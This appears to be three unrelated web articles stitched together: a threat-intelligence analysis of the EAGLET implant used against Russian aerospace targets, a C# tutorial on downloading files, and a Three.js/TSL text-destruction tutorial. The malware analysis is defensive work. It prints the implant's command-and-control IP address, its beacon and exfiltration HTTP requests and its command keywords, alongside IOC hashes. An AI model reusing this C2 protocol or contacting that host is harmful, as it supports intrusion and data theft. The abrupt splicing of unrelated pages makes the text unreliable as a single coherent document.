    Once the DLL implant has been executed, the script extracts a decoy XLS file embedded within the implant: it reads the 59,904-byte XLS file stored just after the first 296,960 bytes and writes it to the %TEMP% directory as Транспортная_накладная_ТТН_№391-44_от_26.06.2025.xls. This is the whole purpose of the malicious LNK file; in the next section, we will look into the decoy file.
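
    For illustration, the carving step amounts to copying a fixed-size slice from a fixed offset. Here is a hypothetical C# equivalent (the file names and paths are placeholders; the actual logic lives in the LNK’s PowerShell script):

    // copy the 59,904-byte decoy stored right after the first 296,960 bytes of the implant
    using FileStream implant = File.OpenRead("Транспортная_накладная_ТТН_№391-44_от_26.06.2025.zip");
    implant.Seek(296_960, SeekOrigin.Begin);
    byte[] decoy = new byte[59_904];
    implant.ReadExactly(decoy);
    File.WriteAllBytes(Path.Combine(Path.GetTempPath(), "decoy.xls"), decoy);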

    Stage 2 – Looking into the Decoy File

    In this section, we will look into the XLS decoy file, which has been extracted from the DLL implant.

    Initially, we identified that the referenced .XLS file is associated with a sanctioned Russian entity, Obltransterminal LLC (ООО “Облтранстерминал”), which appears on the U.S. Department of the Treasury’s OFAC SDN (Specially Designated Nationals) list. The organization has been sanctioned under Executive Order 14024 for its involvement in Russia’s military-logistics infrastructure.

    The XLS file contains structured fields for recording container number, type, tare weight, load capacity, and seal number, as well as vehicle and platform information. Notably, it includes checkboxes for container status—loaded, empty, or under repair—and a schematic area designated for marking physical damage on the container.

    We can also see that the decoy contains a detailed list of container damage codes typically used in Russian logistics operations. These codes cover a wide range of structural and mechanical issues that might be identified during a container inspection, including cracks or punctures (Трещина), deformations of top and bottom beams (Деформация верхних/нижних балок), corrosion (Сквозная коррозия), and the absence or damage of locking rods, hinges, rubber seals, plates, and corner fittings. Each damage type is systematically numbered from 1 to 24, mimicking standardized inspection documentation.

    Overall, the decoy simulates an official Russian container inspection document—specifically, an Equipment Interchange Report (EIR)—used during the transfer or handover of freight containers. It includes structured fields for container specifications, seal numbers, weight, and vehicle data, along with schematic diagrams and a standardized list of 24 damage codes covering everything from cracks and deformations to corrosion and missing parts, associated with Obltransterminal LLC. In the next section, we will look into the EAGLET implant.

    Stage 3 – Malicious EAGLET Implant

    Loading the implant into a PE-analysis tool confirmed that it is a PE file, with the decoy stored inside the overlay section, as we saw previously.

    Next, looking into the exports of this malicious DLL, we examined the EntryPoint, which unfortunately did not contain anything interesting. The DllEntryPoint, however, led us to DllMain, which did contain interesting code related to malicious behavior.

    The first interesting function enumerates information about the target machine.

    In this function, the code creates a unique GUID that identifies the victim. A new GUID is generated every time the implant is executed, mimicking the behavior of a session ID and giving the operator or threat actor clarity on the target.

     

    It then enumerates the computer name of the target machine, along with its hostname and DNS domain name. Once done, it creates a directory named MicrosoftAppStore under the ProgramData location.

    Next, using CreateThread it creates a malicious thread, which is responsible for connecting to the command-and-control[C2] IP and much more.

    Next, we can see that the implant uses Windows networking APIs: WinHttpOpen initiates an HTTP session, masquerading under the uncommon-looking user-agent string MicrosoftAppStore/2001.0, followed by WinHttpConnect, which tries to connect to the hardcoded command-and-control [C2] server 185.225.17.104 over port 80; if it fails, it keeps retrying.

    If the implant connects to the C2, it forms a URL path used to send a GET request to the C2 infrastructure. The entire request looks something like this:

    GET /poll?id={randomly-created-GUID}&hostname={hostname}&domain={domain} HTTP/1.1
    Host: 185.225.17.104

    After sending the request, the implant reads the HTTP response from the C2 server, which may contain commands to execute.

    Regarding functionality, the implant supports shell access, giving the C2 operator or threat actor a shell on the target machine that can be used to perform further malicious activities.

    Another feature is download, which retrieves content from the server and stores it under the location C:\ProgramData\MicrosoftAppStore\. As the C2 is down at the time this research is being published, the files that had been delivered this way could not be recovered.

    Separately from the download feature, it also became evident that the implant exfiltrates data from the target machine. The request body looks something like this:

    POST /result HTTP/1.1
    Host: 185[.]225[.]17[.]104
    Content-Type: application/x-www-form-urlencoded
    
    id=8b9c0f52-e7d1-4d0f-b4de-fc62b4c4fa6f&hostname=VICTIM-PC&domain=CORP&result=Q29tbWFuZCByZXN1bHQgdGV4dA==

    Therefore, the features are as follows.

    | Feature | Trigger Keyword | Behavior | Purpose |
    | --- | --- | --- | --- |
    | Command Execution | cmd: | Executes a shell command received from the C2 server and captures the output | Remote Code Execution |
    | File Download | download: | Downloads a file from a remote location and saves it to C:\ProgramData\MicrosoftAppStore\ | Payload Staging |
    | Exfiltration | (automatic) | Sends back the result of command execution or download status to the C2 server via HTTP POST | Data Exfiltration |

    That sums up the technical analysis of the EAGLET implant. Next, we will look into the infrastructure behind the campaign and hunt for similar campaigns.

    Hunting and Infrastructure

    Infrastructural details

    In this section, we will look into the infrastructure-related artefacts. The C2 we found, 185[.]225[.]17[.]104, is responsible for communicating with the EAGLET implant. The server is located in Romania under ASN 39798 of MivoCloud SRL.

    Looking into it, we found that many passive DNS records point to historical infrastructure previously associated with the threat cluster TA505, which has been researched by Binary Defense. The DNS records suggest that similar or recycled infrastructure has been used in this campaign. We also saw some other dodgy domains with DNS records pointing to this same infrastructure. With high confidence, we can state that the current campaign has no correlation with TA505 beyond the recycled infrastructure mentioned above.

    Similar to the campaign targeting the aerospace sector, we also found another campaign targeting the Russian military sector through recruitment-themed documents. In that campaign, the threat actor used an EAGLET implant that connects to the C2 188[.]127[.]254[.]44, located in Russia under ASN 56694, belonging to the LLC Smart Ape organization.

    Similar Campaigns

    Campaign 1 – Military Themed Targeting

    The URL structure and many other behavioral artefacts of the implant led us to another set of campaigns, using an almost identical implant, aimed at Russian military recruitment.

    This decoy was extracted from an EAGLET implant named Договор_РН83_изменения.zip (which translates to Contract_RN83_Changes), targeting individuals and entities related to Russian military recruitment. As we can see, the decoy highlights multiple advantages of serving, from a housing mortgage to a pension and many more.

    Campaign 2 – EAGLET implant with no decoy embedded

    In the previous campaigns, we saw that the threat entity occasionally drops a malicious LNK that executes the DLL implant and extracts the decoy present inside the implant’s overlay section. In this case, however, we also saw an implant with no such decoy inside.

    Along with these, we saw that these campaigns overlap in target interests and implant code with the threat entity known as Head Mare, which has been targeting Russian-speaking entities and was initially discovered by researchers at Kaspersky.

    Attribution

    Attribution is an essential metric when describing a threat actor or group. It involves analyzing and correlating various domains, including Tactics, Techniques, and Procedures (TTPs), code similarities and reuse, the motivation of the threat actor, and sometimes operational mistakes such as using similar file or decoy nomenclature.

    In our ongoing tracking of UNG0901, we discovered notable similarities and overlaps with the threat group known as Head Mare, as identified by researchers at Kaspersky. Let us explore some of the key overlaps between Head Mare and UNG0901.

    Key Overlaps Between UNG0901 and Head Mare

    1. Tooling Arsenal:

    Researchers at Kaspersky observed that Head Mare often uses a Golang-based backdoor known as PhantomDL, typically packed with a software packer such as UPX, with simple yet functional features such as shell, download, upload, and exit. Similarly, UNG0901 has deployed the EAGLET implant, which shows similar behavior and offers nearly identical features (shell, download, upload, etc.), but is programmed in C++.

    2. File-Naming Technique:

    Researchers at Kaspersky observed that the PhantomDL malware is often deployed via spear-phishing with file names such as Contract_kh02_523. In the campaigns by UNG0901, we witnessed similarly styled file names, such as Contract_RN83_Changes, along with many more file-naming schemes we found to be similar.

    3. Motivation:

    Head Mare has been targeting important entities related to Russia, and UNG0901 has likewise targeted multiple important Russian entities.

    Beyond these, there are additional strong similarities that reinforce the connection between the two threat entities. We therefore assess that UNG0901 shares resources and many other traits with Head Mare, targeting Russian governmental and non-governmental entities.

    Conclusion

    UNG0901, or Unknown-Group-901, demonstrates a targeted cyber operation against Russia’s aerospace and defense sectors, using spear-phishing emails and a custom EAGLET DLL implant for espionage and data exfiltration. UNG0901 also overlaps with Head Mare, showing multiple similarities such as decoy nomenclature and more.

    SEQRITE Protection

    IOCs

    | File-Type | FileName | SHA-256 |
    | --- | --- | --- |
    | LNK | Договор_РН83_изменения.pdf.lnk | a9324a1fa529e5c115232cbbc60330d37cef5c20860bafc63b11e14d1e75697c |
    | LNK | Транспортная_накладная_ТТН_№391-44_от_26.06.2025.xls.lnk | 4d4304d7ad1a8d0dacb300739d4dcaade299b28f8be3f171628a7358720ca6c5 |
    | DLL | Договор_РН83_изменения.zip | 204544fc8a8cac64bb07825a7bd58c54cb3e605707e2d72206ac23a1657bfe1e |
    | DLL | Транспортная_накладная_ТТН_№391-44_от_26.06.2025.zip | 01f12bb3f4359fae1138a194237914f4fcdbf9e472804e428a765ad820f399be |
    | DLL | N/A | b683235791e3106971269259026e05fdc2a4008f703ff2a4d32642877e57429a |
    | DLL | Договор_РН83_изменения.zip | 413c9e2963b8cca256d3960285854614e2f2e78dba023713b3dd67af369d5d08 |
    | Decoy [XLS/PDF] | temp.pdf | 02098f872d00cffabb21bd2a9aa3888d994a0003d3aa1c80adcfb43023809786 |
    | Decoy [XLS/PDF] | sample_extracted.xls | f6baa2b5e77e940fe54628f086926d08cc83c550cd2b4b34b4aab38fd79d2a0d |
    | Decoy [XLS/PDF] | 80650000 | 3e93c6cd9d31e0428085e620fdba017400e534f9b549d4041a5b0baaee4f7aff |
    | Decoy [XLS/PDF] | sample_extracted.xls | c3caa439c255b5ccd87a336b7e3a90697832f548305c967c0c40d2dc40e2032e |
    | Decoy [XLS/PDF] | sample_extracted.xls | 44ada9c8629d69dd3cf9662c521ee251876706ca3a169ca94c5421eb89e0d652 |
    | Decoy [XLS/PDF] | sample_extracted.xls | e12f7ef9df1c42bc581a5f29105268f3759abea12c76f9cb4d145a8551064204 |
    | Decoy [XLS/PDF] | sample_extracted.xls | a8fdc27234b141a6bd7a6791aa9cb332654e47a57517142b3140ecf5b0683401 |
    | Email-File | backup-message-10.2.2.20_9045-800282.eml | ae736c2b4886d75d5bbb86339fb034d37532c1fee2252193ea4acc4d75d8bfd7 |

    MITRE ATT&CK

    | Tactic | Technique | ID | Details |
    | --- | --- | --- | --- |
    | Initial Access | Spearphishing Attachment | T1566.001 | Malicious .EML file sent to VASO employee, impersonating a logistics center with TTN document lure. |
    | Execution | System Binary Proxy Execution: Rundll32 | T1218.011 | DLL implant executed via trusted rundll32.exe LOLBIN, called from the .LNK file. |
    | Execution | PowerShell | T1059.001 | Used for locating and launching the DLL implant from multiple fallback directories. |
    | Persistence | Implant in ZIP-disguised DLL | [Custom] | DLL masquerades as .ZIP file — persistence implied via operator-controlled executions. |
    | Defense Evasion | Masquerading | T1036 | Implant disguised as ZIP, decoy XLS used to simulate sanctioned logistics paperwork. |
    | Discovery | System Information Discovery | T1082 | Gathers hostname, computer name, domain; creates victim GUID to identify target. |
    | Discovery | Domain Trust Discovery | T1482 | Enumerates victim’s DNS domain for network profiling. |
    | Command & Control | Application Layer Protocol: HTTP | T1071.001 | Communicates with C2 via HTTP; uses MicrosoftAppStore/2001.0 User-Agent. |
    | Collection | Data from Local System | T1005 | Exfiltrates system details and file contents as per threat actor’s command triggers. |
    | Exfiltration | Exfiltration Over C2 Channel | T1041 | POST requests to /result endpoint on C2 with encoded command results or exfiltrated data. |
    | Impact | Data Exfiltration | T1537 | Targeted data theft from Russian aerospace sector. |

    Authors:

    Subhajeet Singha

    Sathwik Ram Prakki



    Source link

  • How to download an online file and store it on file system with C# | Code4IT

    How to download an online file and store it on file system with C# | Code4IT


    Downloading a file from a remote resource seems an easy task: download the byte stream and copy it to a local file. Beware of edge cases!


    Downloading files from an online source and saving them on the local machine seems an easy task.

    And guess what? It is!

    In this article, we will learn how to download an online file, perform some operations on it – such as checking its file extension – and store it in a local folder. We will also learn how to deal with edge cases: what if the file does not exist? Can we overwrite existing files?

    How to download a file stream from an online resource using HttpClient

    Ok, this part is easy: if you have the file URL, you can download its content using HttpClient.

    HttpClient httpClient = new HttpClient();
    Stream fileStream = await httpClient.GetStreamAsync(fileUrl);
    

    Using HttpClient this way can cause some trouble, especially under heavy load: creating a new instance for every request risks socket exhaustion. As a matter of fact, using HttpClientFactory is preferred, as we’ve already explained in a previous article.
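
    To give a rough idea, here’s a minimal sketch of what that could look like with IHttpClientFactory injected via dependency injection (the FileDownloader class name is made up for illustration, and AddHttpClient() is assumed to be registered in your DI setup, which requires the Microsoft.Extensions.Http package):

    using System.IO;
    using System.Net.Http;
    using System.Threading.Tasks;
    
    public class FileDownloader
    {
        private readonly IHttpClientFactory _httpClientFactory;
    
        public FileDownloader(IHttpClientFactory httpClientFactory)
        {
            _httpClientFactory = httpClientFactory;
        }
    
        public async Task<Stream> GetFileStream(string fileUrl)
        {
            // Clients created by the factory reuse pooled handlers,
            // which avoids socket exhaustion
            HttpClient httpClient = _httpClientFactory.CreateClient();
            return await httpClient.GetStreamAsync(fileUrl);
        }
    }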

    But, ok, it looks easy – way too easy! There are two more parts to consider.

    How to handle errors while downloading a stream of data

    You know, shit happens!

    There are at least two cases that stop you from downloading a file: the file does not exist, or the file requires authentication to be accessed.

    In both cases, an HttpRequestException is thrown, with the following stack trace:

    at System.Net.Http.HttpResponseMessage.EnsureSuccessStatusCode()
    at System.Net.Http.HttpClient.GetStreamAsyncCore(HttpRequestMessage request, CancellationToken cancellationToken)
    

    As you can see, we are implicitly calling EnsureSuccessStatusCode while getting the stream of data.

    You can tell the consumer that we were not able to download the content in two ways: throw a custom exception or return Stream.Null. We will use Stream.Null for the sake of this article.

    Note: in real-world code, prefer throwing custom exceptions and adding context to them; this way, you give consumers and logs more useful info, while hiding implementation details (see the sketch below).
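
    If you go the custom exception route instead, a minimal sketch could look like this (FileDownloadException is a made-up name, just for illustration):

    public class FileDownloadException : Exception
    {
        public string FileUrl { get; }
    
        public FileDownloadException(string fileUrl, Exception innerException)
            : base($"Unable to download the file at {fileUrl}", innerException)
        {
            FileUrl = fileUrl;
        }
    }

    Wrapping the original HttpRequestException as the inner exception keeps the full stack trace while adding the URL as context.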

    So, let me refactor the part that downloads the file stream and put it in a standalone method:

    async Task<Stream> GetFileStream(string fileUrl)
    {
        HttpClient httpClient = new HttpClient();
        try
        {
            Stream fileStream = await httpClient.GetStreamAsync(fileUrl);
            return fileStream;
        }
        catch (HttpRequestException)
        {
            // The file does not exist or requires authentication
            return Stream.Null;
        }
    }
    

    so that we can use Stream.Null to check for the existence of the stream.

    How to store a file in your local machine

    Now we have our stream of data. We need to store it somewhere.

    We will need to copy our input stream to a FileStream object, placed within a using block.

    using (FileStream outputFileStream = new FileStream(path, FileMode.Create))
    {
        await fileStream.CopyToAsync(outputFileStream);
    }
    

    Possible errors and considerations

    When creating the FileStream instance, we have to pass the constructor both the full destination path, including the file name, and FileMode.Create, which tells the stream what type of operations should be supported.

    FileMode is an enum coming from the System.IO namespace, and has different values. Each value fits best for some use cases.

    public enum FileMode
    {
        CreateNew = 1,    // create the file; throw IOException if it already exists
        Create,           // create the file, overwriting it if it already exists
        Open,             // open an existing file; throw FileNotFoundException if missing
        OpenOrCreate,     // open the file if it exists, otherwise create it
        Truncate,         // open an existing file and clear its contents
        Append            // open or create the file and seek to its end
    }
    

    Again, there are some edge cases that we have to consider:

    • the destination folder does not exist: you will get a DirectoryNotFoundException. You can easily fix it by calling Directory.CreateDirectory to generate the whole hierarchy of folders defined in the path;
    • the destination file already exists: depending on the value of FileMode, you will see different behavior. FileMode.Create overwrites the existing file, while FileMode.CreateNew throws an IOException if the file already exists (see the sketch after this list).
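
    Here’s the sketch mentioned above: a minimal example of handling both edge cases (the paths are just examples):

    string destinationFolder = @"C:\temp\downloads"; // example path
    string path = Path.Combine(destinationFolder, "file.png");
    
    // Avoids DirectoryNotFoundException; it's a no-op if the folder already exists
    Directory.CreateDirectory(destinationFolder);
    
    try
    {
        using FileStream outputFileStream = new FileStream(path, FileMode.CreateNew);
        // ... copy the downloaded stream here
    }
    catch (IOException)
    {
        // With FileMode.CreateNew, landing here usually means the file already exists
    }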

    Full Example

    It’s time to put the pieces together:

    async Task DownloadAndSave(string sourceFile, string destinationFolder, string destinationFileName)
    {
        Stream fileStream = await GetFileStream(sourceFile);
    
        if (fileStream != Stream.Null)
        {
            await SaveStream(fileStream, destinationFolder, destinationFileName);
        }
    }
    
    async Task<Stream> GetFileStream(string fileUrl)
    {
        HttpClient httpClient = new HttpClient();
        try
        {
            Stream fileStream = await httpClient.GetStreamAsync(fileUrl);
            return fileStream;
        }
        catch (HttpRequestException)
        {
            // The file does not exist or requires authentication
            return Stream.Null;
        }
    }
    
    async Task SaveStream(Stream fileStream, string destinationFolder, string destinationFileName)
    {
        if (!Directory.Exists(destinationFolder))
            Directory.CreateDirectory(destinationFolder);
    
        string path = Path.Combine(destinationFolder, destinationFileName);
    
        // FileMode.CreateNew throws an IOException if the destination file already exists
        using (FileStream outputFileStream = new FileStream(path, FileMode.CreateNew))
        {
            await fileStream.CopyToAsync(outputFileStream);
        }
    }
    

    Bonus tips: how to deal with file names and extensions

    You have the file URL, and you want to get its extension and its plain file name.

    You can use some methods from the Path class:

    string image = "https://website.com/csharptips/format-interpolated-strings/featuredimage.png";
    Path.GetExtension(image); // .png
    Path.GetFileNameWithoutExtension(image); // featuredimage
    

    But not every image has a file extension. For example, Twitter cover images have this format: https://pbs.twimg.com/profile_banners/1164441929679065088/1668758793/1080x360

    string image = "https://pbs.twimg.com/profile_banners/1164441929679065088/1668758793/1080x360";
    Path.GetExtension(image); // [empty string]
    Path.GetFileNameWithoutExtension(image); // 1080x360
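
    In cases like that, one simple approach is to fall back to a default extension when Path.GetExtension returns an empty string. Here’s a minimal sketch, assuming you’re happy to treat extension-less URLs as PNGs (the helper name is made up for illustration):

    string GetFileNameWithExtension(string fileUrl, string defaultExtension = ".png")
    {
        string extension = Path.GetExtension(fileUrl);
    
        if (string.IsNullOrEmpty(extension))
            extension = defaultExtension; // assumption: pick a sensible default
    
        return Path.GetFileNameWithoutExtension(fileUrl) + extension;
    }
    
    GetFileNameWithExtension("https://pbs.twimg.com/profile_banners/1164441929679065088/1668758793/1080x360");
    // 1080x360.png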
    

    Further readings

    As I said, you should not instantiate a new HttpClient() every time. You should use HttpClientFactory instead.

    If you want to know more details, I’ve got an article for you:

    🔗 C# Tip: use IHttpClientFactory to generate HttpClient instances | Code4IT

    This article first appeared on Code4IT 🐧

    Wrapping up

    This was a quick article, quite easy to understand – I hope!

    My main point here is that not everything is always as easy as it seems – you should always consider edge cases!

    I hope you enjoyed this article! Let’s keep in touch on Twitter or on LinkedIn, if you want! 🤜🤛

    Happy coding!

    🐧





    Source link

  • Interactive Text Destruction with Three.js, WebGPU, and TSL

    Interactive Text Destruction with Three.js, WebGPU, and TSL



    When Flash was taken from us all those years ago, it felt like losing a creative home — suddenly, there were no tools left for building truly interactive experiences on the web. In its place, the web flattened into a static world of HTML and CSS.

    But those days are finally behind us. We’re picking up where we left off nearly two decades ago, and the web is alive again with rich, immersive experiences — thanks in large part to powerful tools like Three.js.

    I’ve been working with images, video, and interactive projects for 15 years, using things like Processing, p5.js, OpenFrameworks, and TouchDesigner. Last year, I added Three.js to the mix as a creative tool, and I’ve been loving the learning process. That ongoing exploration leads to little experiments like the one I’m sharing in this tutorial.

    Project Structure

    The structure of our script is going to be simple: one function to preload assets, and another one to build the scene.

    Since we’ll be working with 3D text, the first thing we need to do is load a font in .json format — the kind that works with Three.js.

    To convert a .ttf font into that format, you can use the Facetype.js tool, which generates a .typeface.json file.

    // FontLoader ships as a three.js addon, e.g.:
    // import { FontLoader } from "three/addons/loaders/FontLoader.js";
    
    const Resources = {
    	font: null
    };
    
    function preload() {
    
    	const _font_loader = new FontLoader();
    	_font_loader.load( "../static/font/Times New Roman_Regular.json", ( font ) => {
    
    		Resources.font = font;
    		init();
    
    	} );
    
    }
    
    function init() {
    
    }
    
    window.onload = preload;

    Scene setup & Environment

    A classic Three.js scene — the only thing to keep in mind is that we’re working with Three Shader Language (TSL), which means our renderer needs to be a WebGPURenderer.

    const scene = new THREE.Scene();
    const camera = new THREE.PerspectiveCamera(75, window.innerWidth / window.innerHeight, 0.1, 1000);
    const renderer = new THREE.WebGPURenderer({ antialias: true });
    
    document.body.appendChild(renderer.domElement);
    
    renderer.setSize(window.innerWidth, window.innerHeight);
    camera.position.z = 5;
    
    scene.add(camera);

    Next, we’ll set up the scene environment to get some lighting going.

    To keep things simple and avoid loading more assets, we’ll use the default RoomEnvironment that “comes” with Three.js. We’ll also add a DirectionalLight to the scene.

    const environment = new RoomEnvironment();
    const pmremGenerator = new THREE.PMREMGenerator(renderer);
    
    // fromSceneAsync resolves asynchronously, so assign the texture once it's ready
    pmremGenerator.fromSceneAsync(environment).then((envTarget) => {
        scene.environment = envTarget.texture;
    });
    
    scene.environmentIntensity = 0.8;
    
    const light = new THREE.DirectionalLight("#e7e2ca", 5);
    light.position.set(0.0, 1.2, 3.86);
    
    scene.add(light);

    TextGeometry

    We’ll use TextGeometry, which lets us create 3D text in Three.js.

    It uses a JSON font file (which we loaded earlier with FontLoader) and is configured with parameters like size, depth, and letter spacing.

    const text_geo = new TextGeometry("NUEVOS",{
        font:Resources.font,
        size:1.0,
        depth:0.2,
        bevelEnabled: true,
        bevelThickness: 0.1,
        bevelSize: 0.01,
        bevelOffset: 0,
        bevelSegments: 1
    }); 
    
    const mesh = new THREE.Mesh(
        text_geo,
        new THREE.MeshStandardMaterial({ 
            color: "#656565",
            metalness: 0.4, 
            roughness: 0.3
        })
    );
    
    scene.add(mesh);

    By default, the origin of the text sits at (0, 0), but we want it centered.
    To do that, we need to compute its BoundingBox and manually apply a translation to the geometry:

    text_geo.computeBoundingBox();
    const centerOffset = - 0.5 * ( text_geo.boundingBox.max.x - text_geo.boundingBox.min.x );
    const centerOffsety = - 0.5 * ( text_geo.boundingBox.max.y - text_geo.boundingBox.min.y );
    text_geo.translate( centerOffset, centerOffsety, 0 );

    Now that we have the mesh and material ready, we can move on to the function that lets us blow everything up 💥

    Three Shader Language

    I really love TSL — it’s closed the gap between ideas and execution, in a context that’s not always the friendliest… shaders.

    The effect we’re going to implement deforms the geometry’s vertices based on the pointer’s position, and uses spring physics to animate those deformations in a dynamic way.

    But before we get to that, let’s grab a few attributes we’ll need to make everything work properly:

    //  Number of vertices in the geometry
    const count = text_geo.attributes.position.count;
    
    //  Original position of each vertex — we’ll use it as a reference
    //  so unaffected vertices can "return" to their original spot
    const initial_position = storage( text_geo.attributes.position, "vec3", count );
    
    //  Normal of each vertex — we’ll use this to know which direction to "push" in
    const normal_at = storage( text_geo.attributes.normal, "vec3", count );

    Next, we’ll create a storage buffer to hold the simulation data — and we’ll also write a function.
    But not a regular JavaScript function — this one’s a compute function, written in the context of TSL.

    It runs on the GPU and we’ll use it to set up the initial values for our buffers, getting everything ready for the simulation.

    // In this buffer we’ll store the modified positions of each vertex —
    // in other words, their current state in the simulation.
    const position_storage_at = storage(new THREE.StorageBufferAttribute(count, 3), "vec3", count);
    
    const compute_init = Fn( ()=>{
    
    	position_storage_at.element( instanceIndex ).assign( initial_position.element( instanceIndex ) );
    
    } )().compute( count );
    
    // Run the function on the GPU. This runs compute_init once per vertex.
    renderer.computeAsync( compute_init );

    Now we’re going to create another one of these functions — but unlike the previous one, this one will run inside the animation loop, since it’s responsible for updating the simulation on every frame.

    This function runs on the GPU and needs to receive values from the outside — like the pointer position, for example.

    To send that kind of data to the GPU, we use what’s called uniforms. They work like bridges between our “regular” code and the code that runs inside the GPU shader.

    They’re defined like this:

    const u_input_pos = uniform(new THREE.Vector3(0,0,0));
    const u_input_pos_press = uniform(0.0);

    With this, we can calculate the distance between the pointer position and each vertex of the geometry.

    Then we clamp that value so the deformation only affects vertices within a certain radius.
    To do that, we use the step function — it acts like a threshold, and lets us apply the effect only when the distance is below a defined value.

    Finally, we use the vertex normal as a direction to push it outward.

    const compute_update = Fn(() => {
    
        // Original position of the vertex — also its resting position
        const base_position = initial_position.element(instanceIndex);
    
        // The vertex normal tells us which direction to push
        const normal = normal_at.element(instanceIndex);
    
        // Current position of the vertex — we’ll update this every frame
        const current_position = position_storage_at.element(instanceIndex);
    
        // Calculate distance between the pointer and the base position of the vertex
        const distance = length(u_input_pos.sub(base_position));
    
        // Limit the effect's range: it only applies if distance is less than 0.5
        const pointer_influence = step(distance, 0.5).mul(1.0);
    
        // Compute the new displaced position along the normal.
        // Where pointer_influence is 0, there’ll be no deformation.
        const disorted_pos = base_position.add(normal.mul(pointer_influence));
    
        // Assign the new position to update the vertex
        current_position.assign(disorted_pos);
    
    })().compute(count);
    

    To make this work, we’re missing two key steps: we need to assign the buffer with the modified positions to the material, and we need to make sure the renderer runs the compute function on every frame inside the animation loop.

    // Assign the buffer with the modified positions to the material
    mesh.material.positionNode = position_storage_at.toAttribute();
    
    // Animation loop
    function animate() {
    	// Run the compute function
    	renderer.computeAsync(compute_update);
    
    	// Render the scene
    	renderer.renderAsync(scene, camera);
    }
    
    // With WebGPURenderer, the loop is typically driven like this
    renderer.setAnimationLoop(animate);

    Right now the function doesn’t produce anything too exciting — the geometry moves around in a kinda clunky way. We’re about to bring in springs, and things will get much better.

    // Spring — how much force we apply to reach the target value
    velocity += (target_value - current_value) * spring;
    
    // Friction controls the damping, so the movement doesn’t oscillate endlessly
    velocity *= friction;
    
    current_value += velocity;

    But before that, we need to store one more value per vertex, the velocity, so let’s create another storage buffer.

    const position_storage_at = storage(new THREE.StorageBufferAttribute(count, 3), "vec3", count);
    
    // New buffer for velocity
    const velocity_storage_at = storage(new THREE.StorageBufferAttribute(count, 3), "vec3", count);
    
    const compute_init = Fn(() => {
    
        position_storage_at.element(instanceIndex).assign(initial_position.element(instanceIndex));
        
        // We initialize it too
        velocity_storage_at.element(instanceIndex).assign(vec3(0.0, 0.0, 0.0));
    
    })().compute(count);

    We’ll also add two uniforms: spring and friction.

    const u_spring = uniform(0.05);
    const u_friction = uniform(0.9);

    Now we’ve implemented the springs in the update:

    const compute_update = Fn(() => {
    
        const base_position = initial_position.element(instanceIndex);
        const current_position = position_storage_at.element(instanceIndex);
    
        // Get current velocity
        const current_velocity = velocity_storage_at.element(instanceIndex);
    
        const normal = normal_at.element(instanceIndex);
    
        const distance = length(u_input_pos.sub(base_position));
        const pointer_influence = step(distance, 0.5).mul(1.5);
    
        const disorted_pos = base_position.add(normal.mul(pointer_influence));
        disorted_pos.assign((mix(base_position, disorted_pos, u_input_pos_press)));
      
        // Spring implementation
        // velocity += (target_value - current_value) * spring;
        current_velocity.addAssign(disorted_pos.sub(current_position).mul(u_spring));
        // velocity *= friction;
        current_velocity.assign(current_velocity.mul(u_friction));
        // value += velocity
        current_position.addAssign(current_velocity);
    
    
    })().compute(count);

    Now we’ve got everything we need — time to start fine-tuning.

    We’re going to add two things. First, we’ll use the TSL function mx_noise_vec3 to generate some noise for each vertex. That way, we can tweak the direction a bit so things don’t feel so stiff.

    We’re also going to rotate the vertices using another TSL function — surprise, it’s called rotate.

    Here’s what our updated compute_update function looks like:

    // NEW: noise amplitude uniform; it isn't defined earlier in the article,
    // so we assume a small value here
    const u_noise_amp = uniform(0.4);
    
    const compute_update = Fn(() => {
    
        const base_position = initial_position.element(instanceIndex);
        const current_position = position_storage_at.element(instanceIndex);
        const current_velocity = velocity_storage_at.element(instanceIndex);
    
        const normal = normal_at.element(instanceIndex);
    
        // NEW: Add noise so the direction in which the vertices "explode" isn’t too perfectly aligned with the normal
        const noise = mx_noise_vec3(current_position.mul(0.5).add(vec3(0.0, time, 0.0)), 1.0).mul(u_noise_amp);
    
        const distance = length(u_input_pos.sub(base_position));
        const pointer_influence = step(distance, 0.5).mul(1.5);
    
        const disorted_pos = base_position.add(noise.mul(normal.mul(pointer_influence)));
    
        // NEW: Rotate the vertices to give the animation a more chaotic feel
        disorted_pos.assign(rotate(disorted_pos, vec3(normal.mul(distance)).mul(pointer_influence)));
    
        disorted_pos.assign(mix(base_position, disorted_pos, u_input_pos_press));
    
        current_velocity.addAssign(disorted_pos.sub(current_position).mul(u_spring));
        current_position.addAssign(current_velocity);
        current_velocity.assign(current_velocity.mul(u_friction));
    
    })().compute(count);
    

    Now that the motion feels right, it’s time to tweak the material colors a bit and add some post-processing to the scene.

    We’re going to work on the emissive color — meaning it won’t be affected by lights, and it’ll always look bright and explosive. Especially once we throw some bloom on top. (Yes, bloom everything.)

    We’ll start from a base color (whichever you like), passed in as a uniform. To make sure each vertex gets a slightly different color, we’ll offset its hue a bit using values from the buffers — in this case, the velocity buffer.

    The hue function takes a color and a value to shift its hue, kind of like how offsetHSL works in THREE.Color.

    // Base emissive color
    // Base emissive color (note the leading #, required by THREE.Color hex strings)
    const emissive_color = color(new THREE.Color("#0000ff"));
    
    const vel_at = velocity_storage_at.toAttribute();
    const hue_rotated = vel_at.mul(Math.PI*10.0);
    
    // Multiply by the length of the velocity buffer — this means the more movement,
    // the more the vertex color will shift
    const emission_factor = length(vel_at).mul(10.0);
    
    // Assign the color to the emissive node and boost it as much as you want
    mesh.material.emissiveNode = hue(emissive_color, hue_rotated).mul(emission_factor).mul(5.0);

    Finally! Let’s change the scene background color and add Fog:

    scene.fog = new THREE.Fog(new THREE.Color("#41444c"),0.0,8.5);
    scene.background = scene.fog.color;

    Now, let’s spice up the scene with a bit of post-processing — one of those things that got way easier to implement thanks to TSL.

    We’re going to include three effects: ambient occlusion, bloom, and noise. I always like adding some noise to what I do — it helps break up the flatness of the pixels a bit.

    I won’t go too deep into this part — I grabbed the AO setup from the Three.js examples.

    const composer = new THREE.PostProcessing(renderer);
    const scene_pass = pass(scene, camera);
    
    scene_pass.setMRT(mrt({
        output: output,
        normal: normalView
    }));
    
    const scene_color = scene_pass.getTextureNode("output");
    const scene_depth = scene_pass.getTextureNode("depth");
    const scene_normal = scene_pass.getTextureNode("normal");
    
    const ao_pass = ao(scene_depth, scene_normal, camera);
    ao_pass.resolutionScale = 1.0;
    
    const ao_denoise = denoise(ao_pass.getTextureNode(), scene_depth, scene_normal, camera).mul(scene_color);
    const bloom_pass = bloom(ao_denoise, 0.3, 0.2, 0.1);
    
    // "sizes" is assumed to hold the viewport dimensions, e.g. { width: window.innerWidth }
